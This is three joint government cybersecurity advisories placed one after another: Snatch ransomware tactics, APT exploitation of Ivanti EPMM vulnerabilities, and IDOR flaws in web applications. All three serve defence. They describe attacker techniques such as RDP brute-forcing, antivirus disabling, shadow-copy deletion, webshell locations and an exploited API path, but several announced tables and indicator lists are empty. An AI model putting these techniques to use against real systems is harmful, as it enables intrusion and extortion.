SUMMARY

Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.

The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint CSA to disseminate known ransomware IOCs and TTPs associated with the Snatch ransomware variant identified through FBI investigations as recently as June 1, 2023.

Since mid-2021, Snatch threat actors have consistently evolved their tactics to take advantage of current trends in the cybercriminal space and leveraged successes of other ransomware variants’ operations. Snatch threat actors have targeted a wide range of critical infrastructure sectors including the Defense Industrial Base (DIB), Food and Agriculture, and Information Technology sectors. Snatch threat actors conduct ransomware operations involving data exfiltration and double extortion. After data exfiltration often involving direct communications with victims demanding ransom, Snatch threat actors may threaten victims with double extortion, where the victims’ data will be posted on Snatch’s extortion blog if the ransom goes unpaid.

FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this CSA to reduce the likelihood and impact of ransomware incidents.

Download the PDF version of this report:

For a downloadable copy of IOCs, see:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

First appearing in 2018, Snatch operates a ransomware-as-a-service (RaaS) model and claimed their first U.S.-based victim in 2019. Originally, the group was referred to as Team Truniger, based on the nickname of a key group member, Truniger, who previously operated as a GandCrab affiliate. Snatch threat actors use a customized ransomware variant notable for rebooting devices into Safe Mode [T1562.009], enabling the ransomware to circumvent detection by antivirus or endpoint protection, and then encrypting files when few services are running.

Snatch threat actors have been observed purchasing previously stolen data from other ransomware variants in an attempt to further exploit victims into paying a ransom to avoid having their data released on Snatch’s extortion blog. Note: Since November 2021, an extortion site operating under the name Snatch served as a clearinghouse for data exfiltrated or stolen from victim companies on Clearnet and TOR hosted by a bulletproof hosting service. In August 2023, individuals claiming to be associated with the blog gave a media interview claiming the blog was not associated with Snatch ransomware and “none of our targets has been attacked by Ransomware Snatch…”, despite multiple confirmed Snatch victims’ data appearing on the blog alongside victims associated with other ransomware groups, notably Nokoyawa and Conti.[1]

Initial Access and Persistence

Snatch threat actors employ several different methods to gain access to and maintain persistence on a victim’s network. Snatch affiliates primarily rely on exploiting weaknesses in Remote Desktop Protocol (RDP) [T1133] for brute-forcing and gaining administrator credentials to victims’ networks [T1110.001]. In some instances, Snatch affiliates have sought out compromised credentials from criminal forums/marketplaces [T1078].

Snatch threat actors gain persistence on a victim’s network by compromising an administrator account [T1078.002] and establishing connections over port 443 [T1071.001] to a command and control (C2) server located on a Russian bulletproof hosting service [T1583.003]. Per IP traffic from event logs provided by recent victims, Snatch threat actors initiated RDP connections from a Russian bulletproof hosting service and through other virtual private network (VPN) services [T1133].

Data Discovery and Lateral Movement

Snatch threat actors were observed using different TTPs to discover data, move laterally, and search for data to exfiltrate. Snatch threat actors use sc.exe to configure, query, stop, start, delete, and add system services using the Windows Command line. In addition to sc.exe, Snatch threat actors also use tools such as Metasploit and Cobalt Strike [S0154].

Prior to deploying the ransomware, Snatch threat actors were observed spending up to three months on a victim’s system. Within this timeframe, Snatch threat actors exploited the victim’s network [T1590], moving laterally across the victim’s network with RDP [T1021.001] for the largest possible deployment of ransomware and searching for files and folders [T1005] for data exfiltration [TA0010] followed by file encryption [T1486].

Defense Evasion and Execution

During the early stages of ransomware deployment, Snatch threat actors attempt to disable antivirus software [T1562.001] and run an executable as a file named safe.exe or some variation thereof. In recent victims, the ransomware executable’s name consisted of a string of hexadecimal characters which match the SHA-256 hash of the file in an effort to defeat rule-based detection [T1036]. Upon initiation, the Snatch ransomware payload queries and modifies registry keys [T1012][T1112], uses various native Windows tools to enumerate the system [T1569.002], finds processes [T1057], and creates benign processes to execute Windows batch (.bat) files [T1059.003]. In some instances, the program attempts to remove all the volume shadow copies from a system [T1490]. After the execution of the batch files, the executable removes the batch files from the victim’s filesystem [T1070.004].

The Snatch ransomware executable appends a series of hexadecimal characters to each file and folder name it encrypts—unique to each infection—and leaves behind a text file titled HOW TO RESTORE YOUR FILES.TXT in each folder. Snatch threat actors communicate with their victims through email and the Tox communication platform based on identifiers left in ransom notes or through their extortion blog. Since November 2021, some victims reported receiving a spoofed call from an unknown female who claimed association with Snatch and directed them to the group’s extortion site. In some instances, Snatch victims had a different ransomware variant deployed on their systems, but received a ransom note from Snatch threat actors. As a result, the victims’ data is posted on the ransomware blog involving the different ransomware variant and on the Snatch threat actors’ extortion blog.

Indicators of Compromise (IOCs)

The Snatch IOCs detailed in this section were obtained through FBI investigations from September 2022 through June 2023.

Email Domains and Addresses

Since 2019, Snatch threat actors have used numerous email addresses to email victims. Email addresses used by Snatch threat actors are random but usually originate from one of the following domains listed in Tables 1 and 2:

Table 2 shows a list of legitimate email domains offering encrypted email services that have been used by Snatch threat actors. These email domains are all publicly available and legal. The use of these email domains by a threat actor should not be attributed to the email domains, absent specific articulable facts tending to show they are used at the direction or under the control of a threat actor.

The email addresses listed in Table 3 were reported by recent victims.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Tables 4-16 for all referenced threat actor tactics and techniques in this advisory.

MITIGATIONS

The FBI and CISA recommend organizations implement the mitigations below to improve your organization’s cybersecurity posture on the basis of the Snatch threat actor’s activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

• Reduce threat of malicious actors using remote access tools by:
  • Auditing remote access tools on your network to identify currently used and/or authorized software.
  • Reviewing logs for execution of remote access software to detect abnormal use of programs running as a portable executable [CPG 2.T].
  • Using security software to detect instances of remote access software being loaded only in memory.
  • Requiring authorized remote access solutions to be used only from within your network over approved remote access solutions, such as virtual private networks (VPNs) or virtual desktop interfaces (VDIs).
  • Blocking both inbound and outbound connections on common remote access software ports and protocols at the network perimeter.
• Implement application controls to manage and control execution of software, including allowlisting remote access programs.
  • Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation.
• Strictly limit the use of RDP and other remote desktop services. If RDP is necessary, rigorously apply best practices, for example [CPG 2.W]:
  • Audit the network for systems using RDP.
  • Close unused RDP ports.
  • Enforce account lockouts after a specified number of attempts.
  • Apply phishing-resistant multifactor authentication (MFA).
  • Log RDP login attempts.
• Disable command-line and scripting activities and permissions [CPG 2.N].
• Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts [CPG 4.C].
• Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege (PoLP) [CPG 2.E].
• Reduce the threat of credential compromise via the following:
  • Place domain admin accounts in the protected users’ group to prevent caching of password hashes locally.
  • Refrain from storing plaintext credentials in scripts.
• Implement time-based access for accounts set at the admin level and higher [CPG 2.A, 2.E].

In addition, the authoring authorities of this CSA recommend network defenders apply the following mitigations to limit potential adversarial use of common system and network discovery techniques, and to reduce the impact and risk of compromise by ransomware or data extortion actors:

• Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud).
• Maintain offline backups of data and regularly maintain backup and restoration (daily or weekly at minimum). By instituting this practice, an organization limits the severity of disruption to its business practices [CPG 2.R].
• Require all accounts with password logins (e.g., service account, admin accounts, and domain admin accounts) to comply with NIST’s standards for developing and managing password policies.
  • Use longer passwords consisting of at least eight characters and no more than 64 characters in length [CPG 2.B].
  • Store passwords in hashed format using industry-recognized password managers.
  • Add password user “salts” to shared login credentials.
  • Avoid reusing passwords [CPG 2.C].
  • Implement multiple failed login attempt account lockouts [CPG 2.G].
  • Disable password “hints.”
  • Refrain from requiring password changes more frequently than once per year.
    Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password “patterns” cyber criminals can easily decipher.
  • Require administrator credentials to install software.
• Require phishing-resistant multifactor authentication (MFA) for all services to the extent possible, particularly for webmail, virtual private networks (VPNs), and accounts that access critical systems [CPG 2.H].
• Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities in internet-facing systems [CPG 1.E].
• Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks and by restricting adversary lateral movement [CPG 2.F].
• Identify, detect, and investigate abnormal activity and potential traversal of the indicated ransomware with a networking monitoring tool. To aid in detecting the ransomware, implement a tool that logs and reports all network traffic and activity, including lateral movement, on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].
• Install, regularly update, and enable real time detection for antivirus software on all hosts.
• Disable unused ports and protocols [CPG 2.V].
• Consider adding an email banner to emails received from outside your organization [CPG 2.M].
• Disable hyperlinks in received emails.
• Ensure all backup data is encrypted, immutable (i.e., ensure backup data cannot be altered or deleted), and covers the entire organization’s data infrastructure [CPG 2.K, 2.L, 2.R].

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, FBI and CISA recommend exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. FBI and CISA recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

1. Select an ATT&CK technique described in this advisory (see Tables 4-16).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

RESOURCES

• Stopransomware.gov is a whole-of-government approach that gives one central location for ransomware resources and alerts.
• Resource to mitigate a ransomware attack: #StopRansomware Guide.
• No-cost cyber hygiene services: Cyber Hygiene Services and Ransomware Readiness Assessment.

REPORTING

The FBI is seeking any information that can be shared, to include boundary logs showing communication to and from IP addresses, a sample ransom note, communications with Snatch threat actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. The FBI and CISA strongly discourage paying ransom as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, the FBI and CISA urge you to promptly report ransomware incidents to the FBI Internet Crime Complaint Center (IC3) at ic3.gov, a local FBI Field Office, or to CISA at report@cisa.gov or (888) 282-0870.

REFERENCES

[1] DataBreaches.net

DISCLAIMER

The information in this report is being provided “as is” for informational purposes only. FBI and CISA do not endorse any commercial entity, product, or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by FBI or CISA.

VERSION HISTORY

September 20, 2023: Initial version.

SUMMARY

The Cybersecurity and Infrastructure Security Agency (CISA) and the Norwegian National Cyber Security Centre (NCSC-NO) are releasing this joint Cybersecurity Advisory (CSA) in response to active exploitation of CVE-2023-35078 and CVE-2023-35081. Advanced persistent threat (APT) actors exploited CVE-2023-35078 as a zero day from at least April 2023 through July 2023 to gather information from several Norwegian organizations, as well as to gain access to and compromise a Norwegian government agency’s network.

Ivanti released a patch for CVE-2023-35078 on July 23, 2023. Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability CVE-2023-35081 and released a patch for the second vulnerability on July 28, 2023. NCSC-NO observed possible vulnerability chaining of CVE-2023-35081 and CVE-2023-35078.

CVE-2023-35078 is a critical vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM) (formerly known as MobileIron Core). The vulnerability allows threat actors to access personally identifiable information (PII) and gain the ability to make configuration changes on compromised systems. CVE-2023-35081 enables actors with EPMM administrator privileges to write arbitrary files with the operating system privileges of the EPMM web application server. Threat actors can chain these vulnerabilities to gain initial, privileged access to EPMM systems and execute uploaded files, such as webshells.

Mobile device management (MDM) systems are attractive targets for threat actors because they provide elevated access to thousands of mobile devices, and APT actors have exploited a previous MobileIron vulnerability. Consequently, CISA and NCSC-NO are concerned about the potential for widespread exploitation in government and private sector networks.

This CSA provides indicators of compromise (IOCs) and tactics, techniques, and procedures (TTPs) obtained by NCSC-NO investigations. The CSA also includes a nuclei template to identify unpatched devices and detection guidance organizations can use to hunt for compromise. CISA and NCSC-NO encourage organizations to hunt for malicious activity using the detection guidance in this CSA. If potential compromise is detected, organizations should apply the incident response recommendations included in this CSA. If no compromise is detected, organizations should still immediately apply patches released by Ivanti.

Download the PDF version of this report:

TECHNICAL DETAILS

Note: This advisory uses the MITRE ATT&CK^® for Enterprise framework, version 13. See the MITRE ATT&CK Tactics and Techniques section of this advisory for a table of the threat actors’ activity mapped to MITRE ATT&CK® tactics and techniques. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool.

Overview

In July 2023, NCSC-NO became aware of APT actors exploiting a zero-day vulnerability in Ivanti Endpoint Manager (EPMM), formerly known as MobileIron Core, to target a Norwegian government network. Ivanti confirmed that the threat actors exploited CVE-2023-35078 and released a patch on July 23, 2023.[1] Ivanti later determined actors could use CVE-2023-35078 in conjunction with another vulnerability, CVE-2023-35081, and released a patch for the second vulnerability on July 28, 2023.[2]

CVE-2023-35078 is a critical authentication bypass [CWE-288] vulnerability affecting Ivanti Endpoint Manager Mobile (EPMM), formerly known as MobileIron Core. The vulnerability allows unauthenticated access to specific application programming interface (API) paths. Threat actors with access to these API paths can access PII such as names, phone numbers, and other mobile device details of users on the vulnerable system; make configuration changes to vulnerable systems; push new packages to mobile endpoints; and access Global Positioning System (GPS) data if enabled.

According to Ivanti, CVE-2023-35078 can be chained with a second vulnerability CVE-2023-35081.[2] CVE-2023-35081 is directory traversal vulnerability [CWE-22] in EPMM. This vulnerability allows threat actors with EPMM administrator privileges the capability to write arbitrary files, such as webshells, with operating system privileges of the EPMM web application server. The actors can then execute the uploaded file.[2]

CISA added CVE-2023-35078 to its Known Exploited Vulnerabilities Catalog on July 25, 2023, and CVE-2023-35081 on July 31, 2023.

CISA and NCSC-NO are concerned about the potential for widespread exploitation of both vulnerabilities in government and private sector networks because MDM systems provide elevated access to thousands of mobile devices. Threat actors, including APT actors, have previously exploited a MobileIron vulnerability [3],[4].

APT Actor Activity

The APT actors have exploited CVE-2023-35078 since at least April 2023. The actors leveraged compromised small office/home office (SOHO) routers, including ASUS routers, to proxy [T1090] to target infrastructure, and NCSC-NO observed the actors exploiting CVE-2023-35078 to obtain initial access to EPMM devices [T1190] and:

• Perform arbitrary Lightweight Directory Access Protocol (LDAP) queries against the Active Directory (AD).
• Retrieve LDAP endpoints [T1018].
• Use API path /mifs/aad/api/v2/authorized/users to list users and administrators [T1087.002] on the EPMM device.
• Make EPMM configuration changes (Note: It is unknown what configuration changes the actors made).
• Regularly check EPMM Core audit logs [T1005].

The APT actors deleted some of their entries in Apache httpd logs [T1070] using mi.war, a malicious Tomcat application that deletes log entries based on the string in keywords.txt. The actors deleted log entries with the string Firefox/107.0.

The APT actors used Linux and Windows user agents with Firefox/107.0 to communicate with EPMM. Other agents were used; however, these user agents did not appear in the device logs. It is unconfirmed how the threat actors ran shell commands on the EPMM device; however, NCSC-NO suspects the actors exploited CVE-2023-35081 to upload webshells on the EPMM device and run commands [T1059].

The APT actors tunneled traffic [T1572] from the internet through Ivanti Sentry, an application gateway appliance that supports EPMM, to at least one Exchange server that was not accessible from the internet [T1090.001]. It is unknown how they tunneled traffic. NCSC-NO observed that the network traffic used the TLS certificate of the internal Exchange server. The APT actors likely installed webshells [T1505.003] on the Exchange server in the following paths [T1036.005]:

• /owa/auth/logon.aspx
• /owa/auth/logoff.aspx
• /owa/auth/OutlookCN.aspx

NCSC-NO also observed mi.war on Ivanti Sentry but do not know how the actors placed it there.

MITRE ATT&CK TACTICS AND TECHNIQUES

See Table 1—Table 7 for all referenced threat actor tactics and techniques in this advisory.

Table 1: APT Actors ATT&CK Techniques for Initial Access

Table 2: APT Actors ATT&CK Techniques for Execution

Table 3: APT Actors ATT&CK Techniques for Discovery

Table 4: APT Actors ATT&CK Techniques for Persistence

Table 5: APT Actor ATT&CK Techniques for Defense Evasion

Table 6: APT Actor ATT&CK Techniques for Collection

Table 7: APT Actor ATT&CK Techniques for Command and Control

EVIDENCE OF VULNERABILITY METHODS

CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-30578:

CISA recommends administrators use the following CISA-developed nuclei template to determine vulnerability to CVE-2023-35081:

Run the following NCSC-NO-created checks to check for signs of compromise:

1. Investigate logs in centralized logging solutions or forwarded syslogs from EPMM devices for any occurrences of /mifs/aad/api/v2/.
2. Look for spikes or an increase of EventCode=1644 in the AD since at least April 2023. The LDAP queries performed by EPMM when the threat actor used the MIFS API generated tens of millions of this event code. Also look for EventCodes 4662, 5136, and 1153.
3. To detect tunneling activity through Sentry, look for traffic from EPMM devices to other internal servers, as well as TLS traffic towards instances of EPMM with different TLS certificates than the instance itself would possess. Traffic to EPMM with certificates originating from endpoints further inside the network, e.g. standard Windows generated certificates such as CN=EXCHANGE01 or similar.
4. Perform forensic analysis of disk and memory since log retention may be poor and threat actors have been observed deleting log entries. Pay particular attention to unallocated disk space (free space on filesystem).
5. Check for activity from ASUS routers in your own country towards EPMM and Sentry devices.

INCIDENT RESPONSE

If compromise is detected, organizations should:

1. Quarantine or take offline potentially affected hosts.
2. Reimage compromised hosts.
3. Provision new account credentials.
4. Collect and review artifacts such as running processes/services, unusual authentications, and recent network connections.
5. Report the compromise to CISA via CISA’s 24/7 Operations Center (report@cisa.gov or 888-282-0870) or to NCSC-NO via NCSC-NO’s 24/7 Operations Center (cert@ncsc.no or +47 23 31 07 50).

MITIGATIONS

CISA and NCSC-NO recommend organizations:

• Upgrade Ivanti EPMM versions to the latest version as soon as possible. See Ivanti CVE-2023-35081 – Remote Arbitrary File Write for patch information. This patch protects against CVE-2023-35078 and CVE-2023-35081.
  • See the Evidence of Vulnerability Methods section of this advisory for CISA-developed nuclei templates to find any EPMM versions vulnerable to CVE-2023-35078 and CVE-2023-35081.
  • Organizations using unsupported versions (i.e., versions prior to 11.8.1.0) should immediately upgrade to a supported version. If you cannot immediately upgrade, apply the Ivanti-provided RPM fix for CVE-35078 (this workaround does not protect against CVE-2023-35081):
    • Login to command line shell (CLI) in enable mode.
    • Run the following command: # install rpm url https://support.mobileiron.com/ivanti-updates/ivanti-security-update-1.0.0-1.noarch.rp
    • See Ivanti’s Knowledge Base (KB) Remote unauthenticated API access vulnerability – CVE-2023-35078 for more information on the RPM fix.
• Treat MDM systems as high-value assets (HVAs) with additional restrictions and monitoring. MDM systems provide elevated access to thousands of hosts and should be treated as high value assets (HVAs) with additional restrictions and monitoring.
• Follow best cybersecurity practices in production and enterprise environments, including mandating phishing-resistant multifactor authentication (MFA) for all staff and services. For additional best practices, see CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and the National Institute of Standards and Technology (NIST), are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common TTPs. Because the CPGs are a subset of best practices, CISA and NCSC-NO also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).

VALIDATE SECURITY CONTROLS

In addition to applying mitigations, CISA and NCSC-NO recommends exercising, testing, and validating your organization’s security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA recommends testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started: 

1. Select an ATT&CK technique described in this advisory (see Table 1–Table 7).
2. Align your security technologies against the technique.
3. Test your technologies against the technique.
4. Analyze your detection and prevention technologies’ performance.
5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.
6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA recommends continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

REFERENCES

[1] Ivanti: CVE-2023-35078 – Remote Unauthenticated API Access Vulnerability

[2] Ivanti: CVE-2023-35081 – Remote Arbitrary File Write

[3] CISA: Potential for China Cyber Response to Heightened U.S.-China Tensions

[4] CISA: Top Routinely Exploited Vulnerabilities

ACKNOWLEDGEMENTS

Ivanti contributed to this joint advisory.

VERSION HISTORY

August 1, 2023: Initial version.

APPENDIX: INDICATORS OF COMPROMISE

NCSC-NO observed the following webshell hash:

NCSC-NO observed the following hash of mi.war:

NCSC-NO observed the following JA3 Hashes used against MobileIron Core:

NCSC-NO observed the following JA3 Hashes used against Exchange when tunneling via EPMM Sentry:

NCSC-NO observed the following user agents communicating with Exchange (OWA and EWS):

NCSC-NO observed the following user agents communicating with Exchange webshell:

NCSC-NO observed the following user agents communicating with Exchange Autodiscover:

NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):

NCSC-NO observed the following user agent communicating with Exchange (/powershell):

SUMMARY

The Australian Signals Directorate’s Australian Cyber Security Centre (ACSC), U.S. Cybersecurity and Infrastructure Security Agency (CISA), and U.S. National Security Agency (NSA) are releasing this joint Cybersecurity Advisory to warn vendors, designers, and developers of web applications and organizations using web applications about insecure direct object reference (IDOR) vulnerabilities. IDOR vulnerabilities are access control vulnerabilities enabling malicious actors to modify or delete data or access sensitive data by issuing requests to a website or a web application programming interface (API) specifying the user identifier of other, valid users. These requests succeed where there is a failure to perform adequate authentication and authorization checks.

These vulnerabilities are frequently exploited by malicious actors in data breach incidents because they are common, hard to prevent outside the development process, and can be abused at scale. IDOR vulnerabilities have resulted in the compromise of personal, financial, and health information of millions of users and consumers.

ACSC, CISA, and NSA strongly encourage vendors, designers, developers, and end-user organizations to implement the recommendations found within the Mitigations section of this advisory—including the following—to reduce prevalence of IDOR flaws and protect sensitive data in their systems.

• Vendors, designers, and developers of web application frameworks and web applications: Implement secure-by-design and -default principles and ensure software performs authentication and authorization checks for every request that modifies, deletes, and accesses sensitive data.
  • Use automated tools for code review to identify and remediate IDOR and other vulnerabilities.
  • Use indirect reference maps, ensuring that IDs, names, and keys are not exposed in URLs. Replace them with cryptographically strong, random values—specifically use a universally unique identifier (UUID) or a globally unique identifier (GUID).
  • Exercise due diligence when selecting third-party libraries or frameworks to incorporate into your application and keep all third-party frameworks and dependencies up to date.
• All end-user organizations, including organizations with software-as-a-service (SaaS) models:
  • Use due diligence when selecting web applications. Follow best practices for supply chain risk management and only source from reputable vendors.
  • Apply software patches for web applications as soon as possible.
• End-user organizations deploying on-premises software, infrastructure-as-a-service (IaaS), or private cloud models:
  • Review the available authentication and authorization checks in web applications that enable modification of data, deletion of data, or access to sensitive data.
  • Conduct regular, proactive vulnerability scanning and penetration testing to help ensure internet-facing web applications and network boundaries are secure.

Download the PDF version of this report:

TECHNICAL DETAILS

Description

IDOR vulnerabilities are access control vulnerabilities in web applications (and mobile phone applications [apps] using affected web API) that occur when the application or API uses an identifier (e.g., ID number, name, or key) to directly access an object (e.g., a database record) but does not properly check the authentication or authorization of the user submitting the request. Depending on the type of IDOR vulnerability, malicious actors can access sensitive data, modify or delete objects, or access functions.

• Horizontal IDOR vulnerabilities occur when a user can access data that they should not be able to access at the same privilege level (e.g., other user’s data).
• Vertical IDOR vulnerabilities occur when a user can access data that they should not be able to access because the data requires a higher privilege level.
• Object-level IDOR vulnerabilities occur when a user can modify or delete an object that they should not be able to modify or delete.
• Function-level IDOR vulnerabilities occur when a user can access a function or action that they should not be able to access.

Typically, these vulnerabilities exist because an object identifier is exposed, passed externally, or easily guessed—allowing any user to use or modify the identifier.

• In body manipulation, an actor modifies the HTML form field data in the body of a POST request to impact targeted records.
• In URL tampering, an actor modifies an identifier in URLs to impact targeted records.
• In cookie ID manipulation, the actor modifies an identifier in a cookie to an identifier of a different user (including administrative users) in an attempt to gain access to that account.
• In HTTP/JSON request tampering, an actor uses a web proxy to intercept and alter arbitrary portions of legitimate requests, including values inside JSON objects.

Impact

These vulnerabilities are common[1] and hard to prevent outside the development process since each use case is unique and cannot be mitigated with a simple library or security function. Additionally, malicious actors can detect and exploit them at scale using automated tools. These factors place end-user organizations at risk of data leaks (where information is unintentionally exposed) or large-scale data breaches (where a malicious actor obtains exposed sensitive information). Data leaks or breaches facilitated by IDOR vulnerabilities include:

• An October 2021 global data leak incident where mobile phone data, including text messages, call records, photos, and geolocation from hundreds of thousands of devices was exposed by insecure “stalkerware” apps.[2] The apps collected and relayed data from the phones to the same foreign server infrastructure, which contained an IDOR vulnerability, CVE-2022-0732.[3] This led to exposure of the collected app data.[4]
• A 2019 data breach incident where more than 800 million personal financial files, including bank statements, bank account numbers, and mortgage payment documents, from a U.S. Financial Services Sector organization were exposed.[5],[6]
• A 2012 data breach incident where a malicious cyber actor obtained the personal data of more than 100,000 mobile device owners from a U.S. Communications Sector organization’s publicly accessible website.[7]

MITIGATIONS

Vendors and Developers

ACSC, CISA, and NSA recommend that vendors, designers, and implementors of web applications—including organizations that build and deploy software (such as HR tools) for their internal use and organizations that create open-source projects—implement the following mitigations. These mitigations may reduce prevalence of IDOR vulnerabilities in software and help ensure products are secure-by-design and -default.

• Implement and inject secure-by-design and -default principles and best practices into each stage of the software development life cycle (SDLC). Particular recommended practices are defined in the National Institute of Security and Technology’s (NIST’s) Secure Software Development Framework (SSDF), SP 800-218. Lend special attention to:
  • Conducting code reviews [SSDF PW 7.2, RV 1.2] against peer coding standards, checking for backdoors, malicious content, or logic flaws.
    • ACSC, CISA, and NSA recommend using automated code analysis tools for all supported releases to identify and remediate vulnerabilities.
  • Following secure coding practices [SSDF PW 5.1] for web and mobile applications to ensure that they properly validate user input and generate strong user IDs.
    • Use indirect reference maps, such that IDs, names, and keys are not exposed in URLs. Replace them with cryptographically strong, random values—specifically use a UUID or a GUID. Note: UUIDs and GUIDs should not be used for security capabilities. See Request for Comment (RFC) 4122 for more information.
    • Configure applications to deny access by default and ensure the application performs authentication and authorization checks for every request to modify data, delete data, and access sensitive data. For example:
      • Normalize requests. There are many ways to encode and decode web inputs. Decode and normalize inputs before creating access control checkpoints. Ensure the access control system and other parts of the web application perform the same normalization.
      • Implement parameter verification leveraging syntactic and logical validation, such that web applications validate all inputs received with every HTTP/S request. Denying invalid requests can reduce the burden on the access control system.
        • Syntactic validation verifies that for each input the incoming value meets your applications’ expectations. When doing syntactic validation, verify that strings are within the minimum and maximum length required, strings do not contain unacceptable characters, numeric values are within the minimum and maximum boundaries, and the input is of the proper data type.
        • Logical validation adds checks to see if the input values make sense and are consistent with design intent. When doing logical validation, verify authorization checks are performed in the correct locations, are of varying pedigree, and that there is error handling of failed authentication and authorization requests.
    • Use CAPTCHA to limit automated invalid user requests where feasible.
    • Use memory-safe programming languages where possible.
  • Testing code to identify vulnerabilities and verify compliance with security requirements [SSDF PW 8.2].
  • Use automated testing tools to facilitate testing, fuzz testing tools to find issues with input handling,[8] and penetration testing to simulate how a threat actor may exploit the software. Consider using dynamic application security testing (DAST) tools to identify IDOR vulnerabilities in web applications.
  • Conducting role-based training [SSDF PO 2.2] for personnel responsible for secure software development.
  • Exercising due diligence when selecting third-party libraries or frameworks to incorporate into your application [SSDF PW 4.1].
    • Review and evaluate third-party components in the context of their expected use.
    • Verify the integrity of the product through hash or signature verification.
    • If provided, review component’s Software Bill of Materials (SBOM) for outdated, vulnerable, or unauthorized applications before using it.
    • Keep all third-party frameworks and dependencies up to date to limit vulnerability inheritance. Note: Organizations should maintain an inventory or catalog of third-party frameworks and dependencies to assist with proactive updates. Consider using tools to identify project dependencies and known vulnerabilities in third-party code. See OWASP’s Top Ten Proactive Controls 2018, C2: Leverage Security Frameworks and Libraries, for more information.

      For more information, see the joint Enduring Security Framework’s Securing the Software Supply Chain: Recommended Practices Guide for Developers, CISA’s Supply Chain Risk Management Essentials, and ACSC’s Cyber Supply Chain Risk Management.

• Establish a vulnerability disclosure program to verify and resolve security vulnerabilities disclosed by people who may be internal or external to the organization.

Additionally, ACSC, CISA, and NSA recommend following cybersecurity best practices in production and enterprise environments. Software developers are high-value targets because their customers deploy software on their own trusted networks. For best practices, see:

• ACSC’s Essential Eight. The Essential Eight are prioritized strategies to help cybersecurity professionals mitigate cybersecurity incidents caused by various cyber threats.
• CISA’s Cross-Sector Cybersecurity Performance Goals (CPGs). The CPGs, developed by CISA and NIST, are a prioritized subset of IT and OT security practices that can meaningfully reduce the likelihood and impact of known cyber risks and common tactics, techniques, and procedures. Because the CPGs are a subset of best practices, ACSC, CISA, and NSA also recommend software manufacturers implement a comprehensive information security program based on a recognized framework, such as the NIST Cybersecurity Framework (CSF).
• NSA’s Top Ten Cybersecurity Mitigations. The Top Ten sets priorities for enterprise activities to counter a broad range of exploitation techniques and minimize mission impact.

All End-User Organizations

ACSC, CISA, and NSA recommend that all end-user organizations, including those with on-premises software, SaaS, IaaS, and private cloud models, implement the mitigations below to improve their cybersecurity posture.

• Exercise due diligence when selecting web applications. Follow best practices for supply chain risk management and source from reputable vendors that demonstrate commitment to secure-by-design and -default principles.
